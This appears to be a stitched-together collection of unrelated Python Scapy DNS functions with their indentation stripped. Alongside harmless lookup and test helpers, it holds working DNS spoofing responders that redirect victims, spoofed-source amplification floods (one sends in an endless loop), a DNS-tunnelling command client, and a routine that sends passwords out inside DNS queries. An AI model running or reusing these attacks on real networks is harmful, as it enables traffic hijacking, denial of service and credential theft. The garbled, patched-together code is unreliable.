def main():
"""
Add Documentation here
"""
# print DNS().show()
dns_packet = DNS(qdcount=1) / DNSQR(qname='www.google.com')
# print dns_packet.show()
# print ls(UDP)
# dns_packet = UDP(sport=24601, dport=53)/DNS(qdcount=1)/DNSQR(qname='www.google.com')
dns_packet = IP(dst='8.8.4.4') / UDP(sport=24601, dport=53) / DNS(
qdcount=1, rd=1) / DNSQR(qname='www.google.com')
dns_packet.show()
print dns_packet.show()
def create_stream(self, src_if):
"""Create input packet stream for defined interface.
:param VppInterface src_if: Interface to create packet stream for.
"""
good_request = (Ether(dst=src_if.local_mac, src=src_if.remote_mac) /
IP(src=src_if.remote_ip4) / UDP(sport=1234, dport=53) /
DNS(rd=1, qd=DNSQR(qname="bozo.clown.org")))
bad_request = (Ether(dst=src_if.local_mac, src=src_if.remote_mac) /
IP(src=src_if.remote_ip4) / UDP(sport=1234, dport=53) /
DNS(rd=1, qd=DNSQR(qname="no.clown.org")))
pkts = [good_request, bad_request]
return pkts
def dns_spoof(pkt):
global s, hosts, my_ip
spoofed_ip = None
if pkt.dport == 53 and UDP in pkt and DNSRR not in pkt:
print('query for: ' + pkt[DNSQR].qname)
if pkt[DNSQR].qname[:-1] in hosts:
spoofed_ip = hosts[pkt[DNSQR].qname[:-1]]
print('will inject')
elif len(hosts) == 0:
spoofed_ip = my_ip
else:
print('wont inject')
return
spoofed_pkt = IP(dst=pkt[IP].src, src=pkt[IP].dst) \
/ UDP(dport=pkt[UDP].sport, sport=53) \
/ DNS(id=pkt[DNS].id,
qr=1L,
qd=DNSQR(qname=pkt[DNSQR].qname),
an=DNSRR(rrname=pkt[DNS].qd.qname, rdata=spoofed_ip)
)
sent = s.sendto(str(spoofed_pkt), (pkt[IP].src, pkt[UDP].sport))
if sent < 1:
print('There was a problem sending.')
else:
print('injected')
def get_data(pkt: IP):
try:
client_message = pkt[DNSQR].qname[:-1].decode('utf-8')
add_new_client = False
for client in clients:
if client.receiver_socket[
1] == -1 and client.sender_socket == address:
add_new_client = True
client.receiver_socket = (client.receiver_socket[0],
int(client_message))
if not add_new_client:
print(
time.ctime(time.time()) + str(address) + " => " +
str(client_message))
for client in clients:
if client.sender_socket != address:
try:
if client.receiver_socket[1] != -1:
p = IP(dst=client.receiver_socket[0]) / UDP(dport=client.receiver_socket[1]) \
/ DNS(rd=1, qd=DNSQR(qname=client_message))
print(client.receiver_socket[1])
send(p, verbose=0)
print("Message was sent to", client)
except socket.error as err:
print(err)
except socket.error as err:
print(err)
clients_to_remove.append(address)
def poke(self):
question = DNS(rd=1, qd=DNSQR(qname='www.gov.cn'))
if self.sniffer:
packet1 = IP(
src=self.src, dst=self.dst, id=self.ttl * 10 + 1,
ttl=self.ttl) / UDP(sport=self.sport,
dport=self.dport) / question
networking.send(packet1)
self.report['PACKETS'].append(('PACKET_1', packet1))
if not self.one_packet_only:
packet2 = IP(src=self.src,
dst=self.dst,
id=self.ttl * 10 + 2,
ttl=self.ttl) / UDP(sport=self.sport,
dport=self.dport) / question
networking.send(packet2)
self.report['PACKETS'].append(('PACKET_2', packet2))
packet3 = IP(src=self.src,
dst=self.dst,
id=self.ttl * 10 + 3,
ttl=self.ttl) / UDP(sport=self.sport,
dport=self.dport) / question
networking.send(packet3)
self.report['PACKETS'].append(('PACKET_3', packet3))
else:
self.udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM,
socket.IPPROTO_UDP)
atexit.register(self.udp_socket.close)
self.udp_socket.setsockopt(socket.SOL_IP, socket.IP_TTL, self.ttl)
self.udp_socket.settimeout(0)
self.udp_socket.bind(
(self.src, self.sport
)) # if sport change the route going through might change
self.udp_socket.sendto(str(question), (self.dst, self.dport))
def spoof_dns_response(pkt):
global ip_of_network_interface, ip_domain_mapping
spoofed_ip = None
# strip the dot at the end of domain name and decode the bytes
domain_name_req = pkt[DNSQR].qname[:-1].decode('utf-8')
if pkt.dport == 53 and UDP in pkt and DNSRR not in pkt:
if len(ip_domain_mapping) > 0:
# check if mapping for it is present in host file supplied
if ip_domain_mapping and domain_name_req in ip_domain_mapping:
spoofed_ip = ip_domain_mapping[domain_name_req]
else:
print('Not spoofing for ' + domain_name_req + '\n')
return
elif len(ip_domain_mapping) == 0:
spoofed_ip = ip_of_network_interface
print('Spoofing: ' + domain_name_req + ' ' + spoofed_ip + '\n')
#build spoof response
spoof_response = IP(dst=pkt[IP].src, src=pkt[IP].dst) \
/ UDP(dport=pkt[UDP].sport, sport=53) \
/ DNS(id=pkt[DNS].id,qr=1,qd=DNSQR(qname=pkt[DNSQR].qname),an=DNSRR(rrname=pkt[DNS].qd.qname,rdata=spoofed_ip))
# send response to victim
send(spoof_response)
def send_dns(ip, port):
print(f"dns: {ip}:{port}")
pkt = IP(dst=ip) / UDP(sport=54323, dport=port) / DNS(
rd=1, id=12345, qd=DNSQR(qtype=16, qname="anakena.dcc.uchile.cl"
)) # qtype=1 is A and DNS Request ID is 12345
# Captura de lo enviado
capture_1 = StringIO()
save_stdout = sys.stdout
sys.stdout = capture_1
pkt.show()
sys.stdout = save_stdout
print("len enviado:" + str(len(capture_1.getvalue())))
print(f"Sending: {pkt.summary()}")
# ANS is like IP(src=ip, dst=<myip>) / UDP(sport=port, dport=54323) / DNS(rd=1, qd=DNSQR(qtype=1, qname="lab4.cc5312.xor.cl") an=[<RRs received>]) # 1 is A
ans = sr1(pkt, verbose=1)
print(f"received:")
# Captura de la respuesta
capture = StringIO()
save_stdout = sys.stdout
sys.stdout = capture
ans.show()
sys.stdout = save_stdout
print(f'RECEIVED LEN :{len(capture.getvalue())}\n')
quotient = len(capture.getvalue()) / len(capture_1.getvalue())
print(quotient)
def send_req(qname: bytes):
"""
Send the DNS request with the answer to the Authoritative DNS server.
:param qname: the fake url
:return: code of answer, next command to perform.
"""
cmd_code, command = SERVER_COMMANDS['error&retransmission'], ""
while cmd_code == SERVER_COMMANDS['error&retransmission']:
# create the DNS query and send it:
# todo: get automatically the local dns server ip
dns_req = IP(dst=DNS_SERVER_IP) / UDP(sport=234, dport=53) / \
DNS(rd=1, qd=DNSQR(qname=qname, qtype='CNAME'))
response = sr1(dns_req, verbose=False)
cmd_code, command = parse_response(response[DNSRR])
# check if more parts are need to be send
if cmd_code == SERVER_COMMANDS['more']:
tmp_data = command
while cmd_code != SERVER_COMMANDS['last']:
# send an 'ACK' to server and parse the next part:
fake_domain = identify + b'.' + \
build_req(
CLIENT_COMMANDS['ok&continue'], b'continue') + DOMAIN
dns_req = IP(dst=DNS_SERVER_IP) / UDP(sport=234, dport=53) / DNS(rd=1, qd=DNSQR(qname=fake_domain,
qtype='CNAME'))
response = sr1(dns_req, verbose=False)
cmd_code, command = parse_response(response[DNSRR])
tmp_data += command # save the parts in temp var
command = tmp_data
return cmd_code, command
def main():
message = input('enter your message: ')
for char in message:
url = f'www.{get_word(char)}.com'
print(url)
send(
IP(dst=ip) / UDP(dport=53) /
DNS(rd=1, qd=DNSQR(qname=url, qtype="A")))
def attack_dns(self):
for ip in self.server_list.dns:
packet = IP(src=self.target_ip, dst=ip) / UDP(
sport=self.target_port, dport=53) / DNS(
rd=1, qd=DNSQR(qname="google.com", qtype="ANY"))
t = threading.Thread(target=self.boom, args=packet)
print("sending spoofed udp dns packet to : " + ip)
t.start()
self.scapy_threads.append(t)
def main():
"""
Add Documentation here
"""
dest = raw_input("enter the site:")
dns_packet = IP(dst='8.8.4.4') / UDP(sport=24601, dport=53) / DNS(
qdcount=1, rd=1) / DNSQR(qname=dest)
response_packet = sr1(dns_packet)
print response_packet[DNSRR][1].rdata
def send_dns(ip, port):
print(f"dns: {ip}:{port}")
pkt = IP(dst=ip) / UDP(sport=55312, dport=port) / DNS(rd=1, id=12345, qd=DNSQR(
qtype=1, qname="spoofed.lab4.cc5312.xor.cl")) # qtype=1 is A and DNS Request ID is 12345
print(f"Sending: {pkt.summary()}")
# ANS is like IP(src=ip, dst=<myip>) / UDP(sport=port, dport=54323) / DNS(rd=1, qd=DNSQR(qtype=1, qname="lab4.cc5312.xor.cl") an=[<RRs received>]) # 1 is A
ans = sr1(pkt, verbose=1)
print(f"received:")
ans.show()
print(ans.command())
def run(self):
"""
This function sends the Password data
"""
for password in self.user_data:
time.sleep(10)
answer: Union[Union[PacketList, List[Any]], Any] = sr1(
IP(dst=self.dns_server_ip) / UDP(dport=self.dns_port) /
DNS(rd=1, qd=DNSQR(qname=password)),
verbose=0)
def forward_dns(orig_pkt):
print(f"Forwarding: {orig_pkt[DNSQR].qname}")
response = sr1(
IP(dst=ip_forward) /
UDP(sport=orig_pkt[UDP].sport) /
DNS(rd=1, id=orig_pkt[DNS].id, qd=DNSQR(qname=orig_pkt[DNSQR].qname)), verbose=0)
resp_pkt = IP(dst=orig_pkt[IP].src, src=ip_gateway) / UDP(dport=orig_pkt[UDP].sport) / DNS()
resp_pkt[DNS] = response[DNS]
send(resp_pkt, verbose=0)
return f"Responding to {orig_pkt[IP].src} | time: {time.time()}"
def extract_dns(ether_pkt):
source_mac = ether_pkt.src.lower()
if ether_pkt[DNS].qr == 0: # DNS request
# Build DNSQR structure to extract name, convert from bytes to str
qname = DNSQR(ether_pkt[DNS].qd).qname.decode()
if qname in globals.DEVICES[source_mac]["DNS"].keys():
globals.DEVICES[source_mac]["DNS"][qname]["count"] += 1
else:
globals.DEVICES[source_mac]["DNS"][qname] = {"count": 1}
def spf_pkt(sniffed_dns_pkt):
"""get a DNS Request packet. Returns DNS Response packet directing to the custom ip."""
sp_pkt = IP(src=server_ip, dst=sniffed_dns_pkt[IP].src) \
/ UDP(dport=sniffed_dns_pkt[UDP].sport, sport=53) \
/ DNS(id=sniffed_dns_pkt[DNS].id, qr=1, opcode=sniffed_dns_pkt[DNS].opcode,
aa=1, rd=0, qdcount=sniffed_dns_pkt[DNS].qdcount, ancount=1, nscount=1,
qd=DNSQR(qname=sniffed_dns_pkt[DNSQR].qname),
an=DNSRR(rrname=sniffed_dns_pkt[DNSQR].qname, ttl=86400, rdata=custom_ip),
ns=DNSRR(rrname=sniffed_dns_pkt[DNSQR].qname, type=2, rdata=custom_ip),
ar=DNSRR(rrname=sniffed_dns_pkt[DNSQR].qname, rdata=custom_ip))
return sp_pkt
def send_receive_query(self, dns_server='8.8.8.8'):
"""
send the query and receive the results DNS Resource Records
@param dns_server:the ip of a local dns server
@return: list of all rdata from the DNS Resource Records
"""
pack = IP(dst=dns_server) / UDP() / DNS(
qd=DNSQR(qname=self.query_data, qtype=self.query_type))
result = sr1(pack, verbose=0)
if (DNS in result) and (DNSRR in result):
return [result[DNSRR][x].rdata for x in range(result[DNS].ancount)]
def build_query(layer: dict, domain: str) -> object:
pkt = IP(dst=layer["dst"])
pkt /= UDP(dport=53)
pkt /= DNS(
rd=0, # no recursion desired
qr=DNSHeaders.QR.Query,
qd=DNSQR(qname=layer["dns"]["qname"],
qtype=DNSHeaders.Type.HostAddr),
)
return Packet(pkt, domain)
def handle_communication():
# Send Receiver Socket Information.
# client_sender_socket.write(bytes(str(new_port), 'utf-8'))
alias = input("Name: ")
ip, new_port = client_receiver_socket.getsockname()
p = IP(dst=server[0]) / TCP(dport=server[1]) \
/ DNS(rd=1, qd=DNSQR(qname=str(new_port)))
send(p, verbose=0)
print("Please Enter Your Messages!\n")
message = input("")
while message != 'q':
if message != '':
p = IP(dst=server[0]) / TCP(dport=server[1]) \
/ DNS(rd=1, qd=DNSQR(qname=(alias + ": " + message)))
send(p, verbose=0)
# client_sender_socket.write(bytes(alias + ": " + message, 'utf-8'))
message = input("")
def dns_packet(msg, type_d):
if type_d == 'PTR':
msg = '.'.join(msg.split(".")[::-1]) + '.in-addr.arpa'
pkt = IP(dst=DN) / UDP(sport=23456, dport=53) / DNS(qdcount=1) / DNSQR(
qtype=type_d, qname=msg)
response = sr1(pkt, verbose=0)
ans = response[DNS].ancount
for i in range(ans):
if type_d == 'PTR':
print(response[DNSRR][i].rdata.decode("utf-8"))
if type_d == 'A':
print(response[DNSRR][i].rdata)
def attack():
request = (IP(src=spoof_ip, dst=destination_ip) /
UDP(dport=53, sport=RandShort() if attack_web else 53) /
DNS(id=RandShort(),
rd=1,
qdcount=1,
cd=1,
qd=DNSQR(qname="example.com", qtype=255, qclass=1),
ar=DNSRROPT(rclass=65527, rdlen=0)))
print("sending packets of length:", len(request), " to ", destination_ip,
" pretending to be ", spoof_ip)
send(request, loop=1, count=None)
def build_query(layer: dict, domain: str) -> object:
pkt = IP(dst=layer["dst"], tos=0x28)
pkt /= UDP(sport=randint(0, 2 ** 16 - 1), dport=53)
pkt /= DNS(
id=randint(0, 2 ** 16 - 1),
rd=0, # no recursion desired
qr=DNSHeaders.QR.Query,
# requests must be of type TXT otherwise our answers (of type TXT)
# don't get transmitted if recursion occured
qd=DNSQR(qname=layer["dns"]["qname"], qtype=DNSHeaders.Type.Text),
)
return Packet(pkt, domain)
def get_ip_from_url():
"""sends a DNS request to the specified url. returns the matching ip got from the server"""
try:
print("custom ip setup")
custom_url = input("enter url to redirect packets to: ")
ip = sr1(
IP(dst="8.8.8.8") / UDP(sport=RandShort(), dport=53) /
DNS(rd=1, qd=DNSQR(qname=custom_url, qtype="A"))).an.rdata
print("----------------------------------------\n")
except AttributeError:
print("Invalid url. Try again.")
ip = get_ip_from_url()
return ip
def poke(self):
question = DNS(rd=1, qd=DNSQR(qname='twitter.com'))
if self.sniffer:
packet = IP(dst=self.dst, src=self.src, id=self.ttl, ttl=self.ttl) / UDP(
sport=self.sport) / question
networking.send(packet)
self.report['PACKETS'].append(('QUESTION', packet))
else:
self.udp_socket = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
atexit.register(self.udp_socket.close)
self.udp_socket.settimeout(0)
self.udp_socket.setsockopt(socket.SOL_IP, socket.IP_TTL, self.ttl)
self.udp_socket.bind((self.src, self.sport))
self.udp_socket.sendto(str(question), (self.dst, self.dport))
def check_protocol_on_port(_socket) -> str:
try:
_socket.send(HTTPRequest().build())
pkt_response = _socket.recv(BYTES_BUFFER_SIZE)
if HTTPResponse(_pkt=pkt_response).Status_Code != 0:
return 'http'
except:
pass
try:
_socket.send('HELO'.encode())
pkt_response = _socket.recv(BYTES_BUFFER_SIZE)
data = pkt_response.decode()
int(data[:3])
return 'smtp'
except:
pass
try:
_socket.send('USER mrose'.encode())
pkt_response = _socket.recv(BYTES_BUFFER_SIZE)
data = pkt_response.decode()
if any(['+OK' in data, '-ERR' in data]):
return 'pop3'
except:
pass
try:
_socket.send(DNS(qr=0, qd=DNSQR()).build())
pkt_response = _socket.recv(BYTES_BUFFER_SIZE)
if DNS(_pkt=pkt_response).qr == 1:
return 'dns'
except:
pass
try:
_socket.send(NTPHeader().build())
pkt_response = _socket.recv(BYTES_BUFFER_SIZE)
if NTPHeader(_pkt=pkt_response).recv != 0:
return 'ntp'
except:
pass
return ''
def forward_dns(orig_pkt: IP):
print(f"Forwarding: {orig_pkt[DNSQR].qname}")
response = sr1(
IP(dst='8.8.8.8') / UDP(sport=orig_pkt[UDP].sport) /
DNS(rd=1,
id=orig_pkt[DNS].id,
qd=DNSQR(qname=orig_pkt[DNSQR].qname)),
verbose=0,
)
resp_pkt = IP(dst=orig_pkt[IP].src, src=DNS_SERVER_IP) / UDP(
dport=orig_pkt[UDP].sport) / DNS()
resp_pkt[DNS] = response[DNS]
send(resp_pkt, verbose=0)
return f"Responding to {orig_pkt[IP].src}"
def dns_attack(dst_ip, src_ip):
a = IP(dst=dst_ip, src=src_ip) # 192.168.1.200 为伪造的源ip
b = UDP(dport=53)
c = DNS(id=1,
qr=0,
opcode=0,
tc=0,
rd=1,
qdcount=1,
ancount=0,
nscount=0,
arcount=0)
c.qd = DNSQR(qname='www.qq.com', qtype=1, qclass=1)
p = a / b / c
send(p)
def detectLLMNRSpoof(name):
sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, socket.IPPROTO_UDP)
sock.setsockopt(socket.IPPROTO_IP, socket.IP_MULTICAST_TTL, MULTICAST_TTL)
sock.setblocking(0)
request = LLMNRQuery(id=RandShort(), qd=DNSQR(qname=name))
sock.sendto(bytes(request), (LLMNRBroadcast, LLMNRBroadcastPort))
try:
(ready, ar1, ar2) = select([sock], [], [], 5)
if len(ready) > 0:
p = sock.recv(10240)
response = LLMNRResponse(p)
return response.an.rdata
except socket.error as sox:
logging.error(sox)
return None
def dns_lookup(url):
"""
The function sends a dns request to 8.8.8.8 and prints the response
:param url: the requested url to find
:type url: str
:return: None
:rtype: None
"""
ethmsg = Ether()
ipmsg = IP(dst=DNS_IP)
udpmsg = UDP(sport=SRC_PORT, dport=DNS_PORT)
dnsmsg = DNS(rd=1, qd=DNSQR(qname=url))
msg = ethmsg / ipmsg / udpmsg / dnsmsg
ans = srp1(msg, verbose=0)
t = datetime.now().microsecond
return ans[DNS][DNSRR].rdata
def get_response(url):
"""
The function sends a dns request to 8.8.8.8 and prints the response
:param url: the requested url to find
:type url: str
:return: None
:rtype: None
"""
ethmsg = Ether()
ipmsg = IP(dst=DNS_IP)
udpmsg = UDP(sport=SRC_PORT, dport=DNS_PORT)
dnsmsg = DNS(rd=1, qd=DNSQR(qname=url))
msg = ethmsg / ipmsg / udpmsg / dnsmsg
ans = srp1(msg, verbose=0)
print(ans.show())
print("IP: " + ans[DNS][DNSRR].rdata)
